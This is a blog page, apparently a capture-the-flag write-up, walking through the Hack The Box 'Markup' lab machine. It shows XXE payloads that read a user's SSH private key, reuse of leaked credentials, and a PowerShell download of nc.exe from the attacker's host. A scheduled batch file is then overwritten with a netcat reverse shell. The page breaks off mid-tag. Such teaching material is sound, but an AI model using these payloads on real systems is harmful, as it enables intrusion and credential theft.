<!DOCTYPE html>
<html ⚡>
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1">

    <title>Markup Walkthrough</title>

    <link rel="icon" href="/favicon.ico" type="image/x-icon" />
    <link rel="canonical" href="http://192.168.8.3:2368/starting-point-htb-markup-walkthrough/" />
    <meta name="referrer" content="no-referrer-when-downgrade" />
    
    <meta property="og:site_name" content="h4rithd.com" />
    <meta property="og:type" content="article" />
    <meta property="og:title" content="Markup Walkthrough" />
    <meta property="og:description" content="After the Included Walkthrough, Here I&#x27;m with Markup, so... let&#x27;s hack and grab the flags. As I mentioned before, the starting point machines are a series of 9 machines rated as &quot;Very Easy&quot; and should be rooted in a sequence. So it means, if you need to go through this" />
    <meta property="og:url" content="http://192.168.8.3:2368/starting-point-htb-markup-walkthrough/" />
    <meta property="og:image" content="http://192.168.8.3:2368/content/images/2021/05/Markup-.jpg" />
    <meta property="article:published_time" content="2021-05-29T11:21:41.000Z" />
    <meta property="article:modified_time" content="2021-05-30T09:31:39.000Z" />
    <meta property="article:tag" content="h4rithd" />
    <meta property="article:tag" content="Harith Dilshan" />
    <meta property="article:tag" content="Starting Point Walkthrough" />
    <meta property="article:tag" content="Markup Walkthrough" />
    
    <meta property="article:publisher" content="https://www.facebook.com/ShapManasick" />
    <meta name="twitter:card" content="summary_large_image" />
    <meta name="twitter:title" content="Markup Walkthrough" />
    <meta name="twitter:description" content="After the Included Walkthrough, Here I&#x27;m with Markup, so... let&#x27;s hack and grab the flags. As I mentioned before, the starting point machines are a series of 9 machines rated as &quot;Very Easy&quot; and should be rooted in a sequence. So it means, if you need to go through this" />
    <meta name="twitter:url" content="http://192.168.8.3:2368/starting-point-htb-markup-walkthrough/" />
    <meta name="twitter:image" content="http://192.168.8.3:2368/content/images/2021/05/Markup-.jpg" />
    <meta name="twitter:label1" content="Written by" />
    <meta name="twitter:data1" content="Harith Dilshan" />
    <meta name="twitter:label2" content="Filed under" />
    <meta name="twitter:data2" content="h4rithd, Harith Dilshan, Starting Point Walkthrough, Markup Walkthrough" />
    <meta name="twitter:site" content="@h4rithd" />
    <meta name="twitter:creator" content="@h4rithd" />
    <meta property="og:image:width" content="1920" />
    <meta property="og:image:height" content="1035" />
    
    <script type="application/ld+json">
{
    "@context": "https://schema.org",
    "@type": "Article",
    "publisher": {
        "@type": "Organization",
        "name": "h4rithd.com",
        "url": "http://192.168.8.3:2368/",
        "logo": {
            "@type": "ImageObject",
            "url": "http://192.168.8.3:2368/content/images/2021/05/my.png",
            "width": 60,
            "height": 60
        }
    },
    "author": {
        "@type": "Person",
        "name": "Harith Dilshan",
        "image": {
            "@type": "ImageObject",
            "url": "http://192.168.8.3:2368/content/images/2021/05/176773693_2267679413366261_3955357600281674809_n-2.jpg",
            "width": 2000,
            "height": 2000
        },
        "url": "http://192.168.8.3:2368/author/h4rithd/",
        "sameAs": [
            "https://h4rithd.com/",
            "https://twitter.com/h4rithd"
        ]
    },
    "headline": "Markup Walkthrough",
    "url": "http://192.168.8.3:2368/starting-point-htb-markup-walkthrough/",
    "datePublished": "2021-05-29T11:21:41.000Z",
    "dateModified": "2021-05-30T09:31:39.000Z",
    "image": {
        "@type": "ImageObject",
        "url": "http://192.168.8.3:2368/content/images/2021/05/Markup-.jpg",
        "width": 1920,
        "height": 1035
    },
    "keywords": "h4rithd, Harith Dilshan, Starting Point Walkthrough, Markup Walkthrough",
    "description": "After the Included Walkthrough, Here I&#x27;m with Markup, so... let&#x27;s hack and grab\nthe flags.\n\n\n--------------------------------------------------------------------------------\n\nAs I mentioned before, the starting point machines are a series of 9 machines\nrated as &quot;Very Easy&quot; and should be rooted in a sequence. So it means, if you\nneed to go through this box, first of all you must have a complete Included\n[https://h4rithd.com/blog/starting-point-htb-included-walkthrough/index.html] \nmachine.\n\nEnoug",
    "mainEntityOfPage": {
        "@type": "WebPage",
        "@id": "http://192.168.8.3:2368/"
    }
}
    </script>

    <meta name="generator" content="Ghost 4.6" />
    <link rel="alternate" type="application/rss+xml" title="h4rithd.com" href="http://192.168.8.3:2368/rss/" />

    <style amp-custom>
    *,
    *::before,
    *::after {
        box-sizing: border-box;
    }

    html {
        overflow-x: hidden;
        overflow-y: scroll;
        font-size: 62.5%;
        -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    }

    body {
        min-height: 100vh;
        margin: 0;
        padding: 0;
        color: #3a4145;
        font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Open Sans,Helvetica Neue,sans-serif;
        font-size: 1.7rem;
        line-height: 1.55em;
        font-weight: 400;
        font-style: normal;
        background: #fff;
        scroll-behavior: smooth;
        overflow-x: hidden;
        -webkit-font-smoothing: antialiased;
        -moz-osx-font-smoothing: grayscale;
    }

    p,
    ul,
    ol,
    li,
    dl,
    dd,
    hr,
    pre,
    form,
    table,
    video,
    figure,
    figcaption,
    blockquote {
        margin: 0;
        padding: 0;
    }

    ul[class],
    ol[class] {
        padding: 0;
        list-style: none;
    }

    img {
        display: block;
        max-width: 100%;
    }

    input,
    button,
    select,
    textarea {
        font: inherit;
        -webkit-appearance: none;
    }

    fieldset {
        margin: 0;
        padding: 0;
        border: 0;
    }

    label {
        display: block;
        font-size: 0.9em;
        font-weight: 700;
    }

    hr {
        position: relative;
        display: block;
        width: 100%;
        height: 1px;
        border: 0;
        border-top: 1px solid currentcolor;
        opacity: 0.1;
    }

    ::selection {
        text-shadow: none;
        background: #cbeafb;
    }

    mark {
        background-color: #fdffb6;
    }

    small {
        font-size: 80%;
    }

    sub,
    sup {
        position: relative;
        font-size: 75%;
        line-height: 0;
        vertical-align: baseline;
    }
    sup {
        top: -0.5em;
    }
    sub {
        bottom: -0.25em;
    }

    ul li + li {
        margin-top: 0.6em;
    }

    a {
        color: var(--ghost-accent-color, #1292EE);
        text-decoration-skip-ink: auto;
    }

    h1,
    h2,
    h3,
    h4,
    h5,
    h6 {
        margin: 0;
        font-weight: 700;
        color: #121212;
        line-height: 1.4em;
    }

    h1 {
        font-size: 3.4rem;
        line-height: 1.1em;
    }

    h2 {
        font-size: 2.4rem;
        line-height: 1.2em;
    }

    h3 {
        font-size: 1.8rem;
    }

    h4 {
        font-size: 1.7rem;
    }

    h5 {
        font-size: 1.6rem;
    }

    h6 {
        font-size: 1.6rem;
    }

    amp-img {
        height: 100%;
        width: 100%;
        max-width: 100%;
        max-height: 100%;
    }

    amp-img img {
        object-fit: cover;
    }

    .page-header {
        padding: 50px 5vmin 30px;
        text-align: center;
        font-size: 2rem;
        text-transform: uppercase;
        letter-spacing: 0.5px;
    }

    .page-header a {
        color: #121212;
        font-weight: 700;
        text-decoration: none;
        font-size: 1.6rem;
        letter-spacing: -0.1px;
    }

    .post {
        max-width: 680px;
        margin: 0 auto;
    }

    .post-header {
        margin: 0 5vmin 5vmin;
        text-align: center;
    }

    .post-meta {
        margin: 1rem 0 0 0;
        text-transform: uppercase;
        color: #738a94;
        font-weight: 500;
        font-size: 1.3rem;
    }

    .post-image {
        margin: 0 0 5vmin;
    }

    .post-image img {
        display: block;
        width: 100%;
        height: auto;
    }

    .post-content {
        padding: 0 5vmin;
    }

    .post-content > * + * {
        margin-top: 1.5em;
    }

    .post-content [id]:not(:first-child) {
        margin: 2em 0 0;
    }

    .post-content > [id] + * {
        margin-top: 1rem;
    }

    .post-content [id] + .kg-card,
    .post-content blockquote + .kg-card {
        margin-top: 40px;
    }

    .post-content > ul,
    .post-content > ol,
    .post-content > dl {
        padding-left: 1.9em;
    }

    .post-content hr {
        margin-top: 40px;
    }

    .post .post-content hr + * {
        margin-top: 40px;
    }

    .post-content amp-img {
        background-color: #f8f8f8;
    }

    .post-content blockquote {
        position: relative;
        font-style: italic;
    }

    .post-content blockquote::before {
        content: "";
        position: absolute;
        left: -1.5em;
        top: 0;
        bottom: 0;
        width: 0.3rem;
        background: var(--ghost-accent-color, #1292EE);
    }

    .post-content :not(.kg-card):not([id]) + .kg-card {
        margin-top: 40px;
    }

    .post-content .kg-card + :not(.kg-card) {
        margin-top: 40px;
    }

    .kg-card figcaption {
        padding: 1.5rem 1.5rem 0;
        text-align: center;
        font-weight: 500;
        font-size: 1.3rem;
        line-height: 1.4em;
        opacity: 0.6;
    }

    .kg-card figcaption strong {
        color: rgba(0,0,0,0.8);
    }

    .post-content :not(pre) code {
        vertical-align: middle;
        padding: 0.15em 0.4em 0.15em;
        border: #e1eaef 1px solid;
        font-weight: 400;
        font-size: 0.9em;
        line-height: 1em;
        color: #15171a;
        background: #f0f6f9;
        border-radius: 0.25em;
    }

    .post-content > pre {
        overflow: scroll;
        padding: 16px 20px;
        color: #fff;
        background: #1F2428;
        border-radius: 5px;
        box-shadow: 0 2px 6px -2px rgba(0,0,0,.1), 0 0 1px rgba(0,0,0,.4);
    }

    .kg-embed-card {
        display: flex;
        flex-direction: column;
        align-items: center;
        width: 100%;
    }

    .kg-image-card img {
        margin: auto;
    }

    .kg-gallery-card + .kg-gallery-card {
        margin-top: 0.75em;
    }

    .kg-gallery-container {
        position: relative;
    }

    .kg-gallery-row {
        display: flex;
        flex-direction: row;
        justify-content: center;
    }

    .kg-gallery-image {
        width: 100%;
        height: 100%;
    }

    .kg-gallery-row:not(:first-of-type) {
        margin: 0.75em 0 0 0;
    }

    .kg-gallery-image:not(:first-of-type) {
        margin: 0 0 0 0.75em;
    }

    .kg-bookmark-card,
    .kg-bookmark-publisher {
        position: relative;
    }

    .kg-bookmark-container,
    .kg-bookmark-container:hover {
        display: flex;
        flex-wrap: wrap;
        flex-direction: row-reverse;
        color: currentColor;
        background: rgba(255,255,255,0.6);
        font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Open Sans,Helvetica Neue,sans-serif;
        text-decoration: none;
        border-radius: 5px;
        box-shadow: 0 2px 6px -2px rgba(0, 0, 0, 0.1), 0 0 1px rgba(0, 0, 0, 0.4);
        overflow: hidden;
    }

    .kg-bookmark-content {
        flex-basis: 0;
        flex-grow: 999;
        padding: 20px;
        order: 1;
    }

    .kg-bookmark-title {
        font-weight: 600;
        font-size: 1.5rem;
        line-height: 1.3em;
    }

    .kg-bookmark-description {
        display: -webkit-box;
        max-height: 45px;
        margin: 0.5em 0 0 0;
        font-size: 1.4rem;
        line-height: 1.55em;
        overflow: hidden;
        opacity: 0.8;
        -webkit-line-clamp: 2;
        -webkit-box-orient: vertical;
    }

    .kg-bookmark-metadata {
        margin-top: 20px;
    }

    .kg-bookmark-metadata {
        display: flex;
        align-items: center;
        font-weight: 500;
        font-size: 1.3rem;
        line-height: 1.3em;
        white-space: nowrap;
        overflow: hidden;
        text-overflow: ellipsis;
    }

    .kg-bookmark-description {
        display: -webkit-box;
        -webkit-box-orient: vertical;
        -webkit-line-clamp: 2;
        overflow: hidden;
    }

    .kg-bookmark-metadata amp-img {
        width: 18px;
        height: 18px;
        max-width: 18px;
        max-height: 18px;
        margin-right: 10px;
    }

    .kg-bookmark-thumbnail {
        display: flex;
        flex-basis: 20rem;
        flex-grow: 1;
        justify-content: flex-end;
    }

    .kg-bookmark-thumbnail amp-img {
        max-height: 200px;
    }

    .kg-bookmark-author {
        white-space: nowrap;
        text-overflow: ellipsis;
        overflow: hidden;
    }

    .kg-bookmark-publisher::before {
        content: "•";
        margin: 0 .5em;
    }

    .kg-width-full.kg-card-hascaption {
        display: grid;
        grid-template-columns: inherit;
    }

    .post-content table {
        border-collapse: collapse;
        width: 100%;
    }

    .post-content th {
        padding: 0.5em 0.8em;
        text-align: left;
        font-size: .75em;
        text-transform: uppercase;
    }

    .post-content td {
        padding: 0.4em 0.7em;
    }

    .post-content tbody tr:nth-child(2n + 1) {
        background-color: rgba(0,0,0,0.1);
        padding: 1px;
    }

    .post-content tbody tr:nth-child(2n + 2) td:last-child {
        box-shadow:
            inset 1px 0 rgba(0,0,0,0.1),
            inset -1px 0 rgba(0,0,0,0.1);
    }

    .post-content tbody tr:nth-child(2n + 2) td {
        box-shadow: inset 1px 0 rgba(0,0,0,0.1);
    }

    .post-content tbody tr:last-child {
        border-bottom: 1px solid rgba(0,0,0,.1);
    }

    .page-footer {
        padding: 60px 5vmin;
        margin: 60px auto 0;
        text-align: center;
        background-color: #f8f8f8;
    }

    .page-footer h3 {
        margin: 0.5rem 0 0 0;
    }

    .page-footer p {
        max-width: 500px;
        margin: 1rem auto 1.5rem;
        font-size: 1.7rem;
        line-height: 1.5em;
        color: rgba(0,0,0,0.6)
    }

    .powered {
        display: inline-flex;
        align-items: center;
        margin: 30px 0 0;
        padding: 6px 9px 6px 6px;
        border: rgba(0,0,0,0.1) 1px solid;
        font-size: 12px;
        line-height: 12px;
        letter-spacing: -0.2px;
        font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif;
        font-weight: 500;
        color: #222;
        text-decoration: none;
        background: #fff;
        border-radius: 6px;
    }

    .powered svg {
        height: 16px;
        width: 16px;
        margin: 0 6px 0 0;
    }

    @media (max-width: 600px) {
        body {
            font-size: 1.6rem;
        }
        h1 {
            font-size: 3rem;
        }

        h2 {
            font-size: 2.2rem;
        }
    }

    @media (max-width: 400px) {
        h1 {
            font-size: 2.6rem;
            line-height: 1.15em;
        }
        h2 {
            font-size: 2rem;
            line-height: 1.2em;
        }
        h3 {
            font-size: 1.7rem;
        }
    }

    :root {--ghost-accent-color: #2c90e8;}
    </style>

    <style amp-boilerplate>body{-webkit-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-moz-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-ms-animation:-amp-start 8s steps(1,end) 0s 1 normal both;animation:-amp-start 8s steps(1,end) 0s 1 normal both}@-webkit-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-moz-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-ms-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-o-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}</style><noscript><style amp-boilerplate>body{-webkit-animation:none;-moz-animation:none;-ms-animation:none;animation:none}</style></noscript>
    <script async src="https://cdn.ampproject.org/v0.js"></script>

    

</head>

<body class="amp-template">
    <header class="page-header">
        <a href="http://192.168.8.3:2368">
                <amp-img class="site-icon" src="http://192.168.8.3:2368/content/images/2021/05/hnet.com-image.ico" width="50" height="50" layout="fixed"></amp-img>
        </a>
    </header>

    <main class="content" role="main">
        <article class="post">

            <header class="post-header">
                <h1 class="post-title">Markup Walkthrough</h1>
                <section class="post-meta">
                    Harith Dilshan -
                    <time class="post-date" datetime="2021-05-29">29 May 2021</time>
                </section>
            </header>
            <figure class="post-image">
                <amp-img src="http://192.168.8.3:2368/content/images/2021/05/Markup-.jpg" width="600" height="340" layout="responsive"></amp-img>
            </figure>
            <section class="post-content">

                <p>After the Included Walkthrough, Here I'm with Markup, so... let's hack and grab the flags.</p><hr></hr><p>As I mentioned before, the starting point machines are a series of 9 machines rated as "<strong>Very Easy</strong>" and should be <strong>rooted in a sequence</strong>. So it means, if you need to go through this box, first of all you must have a complete <a href="https://h4rithd.com/blog/starting-point-htb-included-walkthrough/index.html">Included</a> machine.</p><p>Enough talks, 🥱 Let’s Get It Started 🐱‍💻</p>
<div class="elfsight-app-a4de7430-6c0c-44b8-aada-9b9ac759e396"></div><blockquote><strong>Disclaimers: </strong>No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedure to grab the flags! 🐱‍👤</blockquote><hr></hr><h2 id="00-start-machine-%E2%80%A6"><strong>00. Start Machine …</strong></h2><p>To start the machine, just click on "<strong>Spawn Machine</strong>".</p><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-299.png" class="kg-image" alt width="1615" height="743" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-299.png 600w, http://192.168.8.3:2368/content/images/size/w1000/2021/05/image-299.png 1000w, http://192.168.8.3:2368/content/images/size/w1600/2021/05/image-299.png 1600w, http://192.168.8.3:2368/content/images/2021/05/image-299.png 1615w" layout="responsive"></amp-img></figure><p>Then you can see the <strong>IP </strong>address for that machine.<strong> 🤠</strong></p><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-300.png" class="kg-image" alt width="416" height="459" layout="responsive"></amp-img></figure><p>Before going to enumeration steps we can simply ping to the IP address and check whether  the VPN is connected and the machine is alive. Sometimes the machines might "Disable" ping requests when passing through the firewall. But in most cases ping will be a success! 🙂</p><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-301.png" class="kg-image" alt width="1492" height="554" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-301.png 600w, http://192.168.8.3:2368/content/images/size/w1000/2021/05/image-301.png 1000w, http://192.168.8.3:2368/content/images/2021/05/image-301.png 1492w" layout="responsive"></amp-img></figure><p>As a ping result, its <code>TTL=127</code>. There is only one route between machine and us (VPN). So definitely it will be a <code>Windows</code> machine.</p><hr></hr><h2 id="01-enumeration-first-%E2%80%A6"><strong>01. Enumeration First …</strong></h2><h3 id="011-fast-ports-scan"><strong>01.1 Fast ports scan</strong></h3><p>As usual, run Nmap fast scan for all TCP ports to identify the ports which are open.</p><pre><code class="language-bash">nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.49</code></pre><pre><code class="language-bash">-n  : Never do DNS resolution
-vv	: Extra verbosity
--open	: Output only open ports
-p-	: Full TCP ports range (65535)
-T4	: Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network</code></pre><p>Here is the output 👇</p><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-302.png" class="kg-image" alt width="1764" height="1106" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-302.png 600w, http://192.168.8.3:2368/content/images/size/w1000/2021/05/image-302.png 1000w, http://192.168.8.3:2368/content/images/size/w1600/2021/05/image-302.png 1600w, http://192.168.8.3:2368/content/images/2021/05/image-302.png 1764w" layout="responsive"></amp-img></figure><p>There're only webserver and SSH server. 🤷‍♂️🤷‍♂️</p><h3 id="012-run-nmap-scripting-engine"><strong>01.2 Run Nmap Scripting Engine</strong></h3><p>To get the best result, we can run the <code>Nmap Scripting Engine</code> for all open ports. Now we know all of the open ports and therefore, we can point out and run the script engine as fast as possible.</p><pre><code class="language-bash">nmap -sV -sC -oN DetailPorts.nmap -p 22,80,443 10.10.10.49</code></pre><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-304.png" class="kg-image" alt width="1806" height="1546" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-304.png 600w, http://192.168.8.3:2368/content/images/size/w1000/2021/05/image-304.png 1000w, http://192.168.8.3:2368/content/images/size/w1600/2021/05/image-304.png 1600w, http://192.168.8.3:2368/content/images/2021/05/image-304.png 1806w" layout="responsive"></amp-img></figure><p>So as usual, I chose webserver as my first enumeration path and I choose port 80 from that too. Let's open the web browser and navigate to the <code>http://10.10.10.49/</code></p><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-303.png" class="kg-image" alt width="1423" height="754" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-303.png 600w, http://192.168.8.3:2368/content/images/size/w1000/2021/05/image-303.png 1000w, http://192.168.8.3:2368/content/images/2021/05/image-303.png 1423w" layout="responsive"></amp-img></figure><p>This time, it is <strong>MegaShopping</strong> login page. Again it's time to check previous passwords. Do you remember we got some <code>sql</code> credentials from the <a href="https://h4rithd.com/blog/starting-point-htb-included-walkthrough/index.html">include</a> machine? Let's try those first. 🤨🤨 </p><p><code>Daniel : &gt;SNDv*2wzLWf</code> Believe me we have done it at our first attempt. 😎😎</p><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-305.png" class="kg-image" alt width="1414" height="747" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-305.png 600w, http://192.168.8.3:2368/content/images/size/w1000/2021/05/image-305.png 1000w, http://192.168.8.3:2368/content/images/2021/05/image-305.png 1414w" layout="responsive"></amp-img></figure><p>Now we have to take a moment to examine the surroundings of this site. While doing so, I found a way forward and this time it is <strong>XML external entity (<a href="https://portswigger.net/web-security/xxe">XXE</a>) injection. </strong>Okay now let's look at this from the beginning. </p><p>Power up Burp Suite and examine all the requests. While you are doing so, take a look at how the function works for submitting orders. </p><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-309.png" class="kg-image" alt width="1675" height="676" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-309.png 600w, http://192.168.8.3:2368/content/images/size/w1000/2021/05/image-309.png 1000w, http://192.168.8.3:2368/content/images/size/w1600/2021/05/image-309.png 1600w, http://192.168.8.3:2368/content/images/2021/05/image-309.png 1675w" layout="responsive"></amp-img></figure><p>See! . It's an XML request. So let's begin. </p><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-322.png" class="kg-image" alt width="735" height="500" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-322.png 600w, http://192.168.8.3:2368/content/images/2021/05/image-322.png 735w" layout="responsive"></amp-img></figure><blockquote>XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access. <a href="https://portswigger.net/web-security/xxe">source</a></blockquote><p>Now you have an idea about XEE right? I got some sample exploit too from the above source. But since this is an windows machine we have to change some parts of that exploit. Final exploit will be look like this.👇👇</p><pre><code class="language-xml">&lt;?xml version="1.0" encoding="UTF-8"?&gt;
&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"&gt; ]&gt;
  &lt;order&gt;
     &lt;quantity&gt;
          1
     &lt;/quantity&gt;
     &lt;item&gt;
          &amp;xxe;
     &lt;/item&gt;
     &lt;address&gt;
          h4rithd.com
     &lt;/address&gt;
  &lt;/order&gt;</code></pre><p>Now issue the request to the Repeater tab by using <code>ctrl + r</code> then navigate to the Repeater tab. Change the XML code as above and click send. You can examine the payload code by changing the <code>&amp;xxe;</code> for other parameters as well (quantity &amp; address) but it will not be successful! 🤷‍♂️🤷‍</p><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-310.png" class="kg-image" alt width="1254" height="559" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-310.png 600w, http://192.168.8.3:2368/content/images/size/w1000/2021/05/image-310.png 1000w, http://192.168.8.3:2368/content/images/2021/05/image-310.png 1254w" layout="responsive"></amp-img></figure><p>As you can see now, the exploit is working. Now what the hack can we do using this? 😏😏. We can view any files...🙄🙄 Again It's enumerating time. ⏳⏳</p><p>This machine has port 22 open, Wait.. If it is possible to grab the ssh private key, we can login to the system.  Since we have one user name called <code>Daniel</code> let's use it. In windows file system default SSH keys were stored in <code>C:\Users\&lt;username&gt;\.ssh\</code></p><p>Let's check if we can grab the <code>id_rsa</code>. The payload will be like below.👇👇</p><pre><code class="language-XML">&lt;?xml version="1.0" encoding="UTF-8"?&gt;
&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM "file:///C:/Users/Daniel/.ssh/id_rsa"&gt; ]&gt;
  &lt;order&gt;
     &lt;quantity&gt;
          1
     &lt;/quantity&gt;
     &lt;item&gt;
          &amp;xxe;
     &lt;/item&gt;
     &lt;address&gt;
          h4rithd.com
     &lt;/address&gt;
  &lt;/order&gt;</code></pre><p>Oh gosh!! We grabbed the private key. 🔑🔑</p><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-324.png" class="kg-image" alt width="1144" height="487" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-324.png 600w, http://192.168.8.3:2368/content/images/size/w1000/2021/05/image-324.png 1000w, http://192.168.8.3:2368/content/images/2021/05/image-324.png 1144w" layout="responsive"></amp-img></figure><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-312.png" class="kg-image" alt width="1303" height="611" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-312.png 600w, http://192.168.8.3:2368/content/images/size/w1000/2021/05/image-312.png 1000w, http://192.168.8.3:2368/content/images/2021/05/image-312.png 1303w" layout="responsive"></amp-img></figure><p>Now copy it to our machine and <strong>change the file permissions to read only</strong> by using <code>chmod 600 id_rsa</code> and then try to connect via ssh user as Daniel. </p><pre><code class="language-bash">ssh -i id_rsa Daniel@10.10.10.49</code></pre><p>We were entered to the machine as user Daniel. Let's grab the user flag now. 😋😋</p><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-313.png" class="kg-image" alt width="1402" height="478" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-313.png 600w, http://192.168.8.3:2368/content/images/size/w1000/2021/05/image-313.png 1000w, http://192.168.8.3:2368/content/images/2021/05/image-313.png 1402w" layout="responsive"></amp-img></figure><hr></hr><h2 id="03-privilege-escalation"><strong>03. Privilege Escalation</strong></h2><p>Again we have windows machine to escalate the privileges. You can get cool ideas for Privilege Escalation by referring following links.</p><ol><li><a href="https://www.fuzzysecurity.com/tutorials/16.html">Windows Privilege Escalation Fundamentals</a></li><li><a href="https://infosecwriteups.com/privilege-escalation-in-windows-380bee3a2842">Privilege Escalation in Windows</a></li></ol><p>While we're running the <a href="https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS">winPEAS</a> on the background I got another SSH window to enumerate manually, so find what we can do. There, I found a folder called  <code>Log-Management</code> in the top of root in drive <code>C:</code> So, time to have a quick look at what is inside that folder. </p><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-314.png" class="kg-image" alt width="1492" height="1290" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-314.png 600w, http://192.168.8.3:2368/content/images/size/w1000/2021/05/image-314.png 1000w, http://192.168.8.3:2368/content/images/2021/05/image-314.png 1492w" layout="responsive"></amp-img></figure><p>Here the folder has Batch file. Can we view that ??</p><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-315.png" class="kg-image" alt width="1492" height="846" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-315.png 600w, http://192.168.8.3:2368/content/images/size/w1000/2021/05/image-315.png 1000w, http://192.168.8.3:2368/content/images/2021/05/image-315.png 1492w" layout="responsive"></amp-img></figure><p>The script will call the <code>wevtutil.exe</code>.</p><blockquote><strong>wevtutil </strong>| Enables you to retrieve information about event logs and publishers. You can also use this command to install and uninstall event manifests, to run queries, and to export, archive, and clear logs. <a href="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil">source</a></blockquote><p>By analyzing the source code, we understand that this script simply clears the system event logs. 😯😯</p><p>Let's take a look at the permission on this file using <code>icacls</code> command. I think this would be easy if we change the <code>cmd shell</code> as <code>powershell</code>. Just type <strong>powershell </strong>and hit enter.  </p><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-316.png" class="kg-image" alt width="1492" height="626" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-316.png 600w, http://192.168.8.3:2368/content/images/size/w1000/2021/05/image-316.png 1000w, http://192.168.8.3:2368/content/images/2021/05/image-316.png 1492w" layout="responsive"></amp-img></figure><p>Here it seems like the group <code>BUILTIN\Users</code> has the full control <strong>(F)</strong> over the batch file. </p><blockquote>Builtin\users are all the users that the OS creates when installing the OS including local accounts (e.g. guest, ASP.NET or IUSR_hostname). <strong>It also includes all the users created in the domain</strong>. Authenticated users are all users that belong to the domain and have credentials. <a href="https://social.technet.microsoft.com/Forums/lync/en-US/a8a00a18-ecd6-4ece-8dee-1248bfe6e9ed/what-is-the-difference-between-builtinusers-and-authenticated-users?forum=sharepointadminlegacy#:~:text=Builtin%5Cusers%20are%20all%20the,the%20domain%20and%20have%20credentials.">source</a></blockquote><p>Since the above group has the full control over the file and all the users (even Daniel) are included to that group... we can edit that batch file. 🤐🤐</p><h3 id="031-getting-the-reverse-shell">03.1 Getting the Reverse Shell</h3><p>So to get the reverse shell using that script file; we need netcat binary and then create the payload file inside the batch file. So let's power up python web server and then download it into the Markup machine.</p><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-317.png" class="kg-image" alt width="1724" height="700" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-317.png 600w, http://192.168.8.3:2368/content/images/size/w1000/2021/05/image-317.png 1000w, http://192.168.8.3:2368/content/images/size/w1600/2021/05/image-317.png 1600w, http://192.168.8.3:2368/content/images/2021/05/image-317.png 1724w" layout="responsive"></amp-img></figure><p>Navigate to <code>C:\Users\Daniel\</code> and use the following command to download it into the Markup machine by using the power of powershell. Change &lt;YourIP&gt; as yours.☺☺</p><pre><code class="language-bash">Powershell -c "IWR -useBasicParsing http://&lt;YourIP&gt;:8888/nc.exe -o nc.exe"</code></pre><p>Then we can create the payload (netcat reverse shell) by using netcat binary to the job.bat file. Change &lt;YourIP&gt; as yours.</p><pre><code class="language-bash">echo C:\Users\Daniel\nc.exe -e cmd.exe &lt;YourIP&gt; 7878&gt; C:\Log-Management\job.bat</code></pre><p>Then again power up the netcat listener and now we need to wait until that script runs as schedules in cron job.</p><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-318.png" class="kg-image" alt 